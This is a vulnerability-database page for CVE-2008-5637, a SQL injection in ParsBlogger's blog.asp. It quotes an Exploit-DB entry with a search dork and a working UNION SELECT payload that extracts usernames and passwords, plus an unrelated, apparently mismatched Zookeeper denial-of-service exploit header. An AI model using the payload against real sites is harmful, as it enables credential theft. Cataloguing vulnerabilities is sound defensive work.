CVE-2008-5637
published 2008-12-17CVE-2008-5637: SQL injection vulnerability in blog.asp in ParsBlogger (Pb) allows remote attackers to execute arbitrary SQL commands via the wr parameter.
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.99%
78.2th percentile
SQL injection vulnerability in blog.asp in ParsBlogger (Pb) allows remote attackers to execute arbitrary SQL commands via the wr parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| parsblogger | parsblogger | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Zookeeper 3.5.2 Client - Denial of Service
exploitdb·2017-07-02
CVE-2017-5637 Zookeeper 3.5.2 Client - Denial of Service
Zookeeper 3.5.2 Client - Denial of Service
---
#!/usr/bin/python
# Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
# Date: 2/7/2017
# Exploit Author: Brandon Dennis
# Email: [email protected]
# Software Link: http://zookeeper.apache.org/releases.html#download
# Zookeeper Version: 3.5.2
# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client.
# This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic.
# The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zook
Exploit-DB
ParsBlogger - 'blog.asp' SQL Injection
exploitdb·2008-11-26
CVE-2008-5637 ParsBlogger - 'blog.asp' SQL Injection
ParsBlogger - 'blog.asp' SQL Injection
---
[~] Script : ParsBlogger
[~] Version : >!<
[~] Link : http://www.parsblogger.com
[~] Dork : "Powered by ParsBlogger"
[~] Author : BorN To K!LL
[~] TeaM : Security Geeks [ Sec-Geeks.com ]
[~] Exploit :.
site.ir/blog.asp?wr=[SQL]
[~] Example :.
site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--
[~] Greetings :.
[ Är ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims
# milw0rm.com [2008-11-26]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4778http://www.securityfocus.com/bid/32488http://www.vupen.com/english/advisories/2008/3270https://www.exploit-db.com/exploits/7239http://securityreason.com/securityalert/4778http://www.securityfocus.com/bid/32488http://www.vupen.com/english/advisories/2008/3270https://www.exploit-db.com/exploits/7239
2008-12-17
Published